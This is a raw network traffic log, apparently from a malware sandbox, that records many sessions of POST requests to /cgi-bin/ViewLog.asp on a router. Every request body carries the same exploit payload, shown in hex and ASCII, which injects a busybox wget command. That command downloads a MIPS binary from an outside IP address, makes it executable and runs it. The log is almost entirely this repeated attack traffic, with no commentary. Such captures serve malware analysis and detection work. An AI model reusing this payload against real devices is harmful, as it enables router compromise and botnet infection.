                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:00.821171045 CET381INHTTP/1.1 404 Not Found
                                              Date: Thu, 23 Nov 2023 04:18:00 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Keep-Alive: timeout=8
                                              Vary: Accept-Encoding
                                              Content-Encoding: gzip
                                              Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              633192.168.2.145286831.136.150.808080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:00.650646925 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:01.217573881 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:02.369522095 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:04.673430920 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:09.281275988 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:18.496917009 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              634192.168.2.144725431.136.64.248080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:00.651853085 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:01.249638081 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:02.401521921 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:04.929464102 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:09.537204981 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:18.752820015 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              635192.168.2.145550095.87.241.498080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:00.752774954 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              636192.168.2.145826494.187.107.2388080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:00.766159058 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              637192.168.2.145158631.200.107.1228080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:00.766813993 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              638192.168.2.145252031.136.60.168080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:00.828560114 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:01.409715891 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:02.529495955 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:04.929464102 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:09.537204981 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:18.496921062 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              639192.168.2.144404231.44.131.908080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:00.943805933 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              640192.168.2.144492431.136.247.1818080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:01.660624027 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:04.673418045 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:10.817167044 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:22.848650932 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
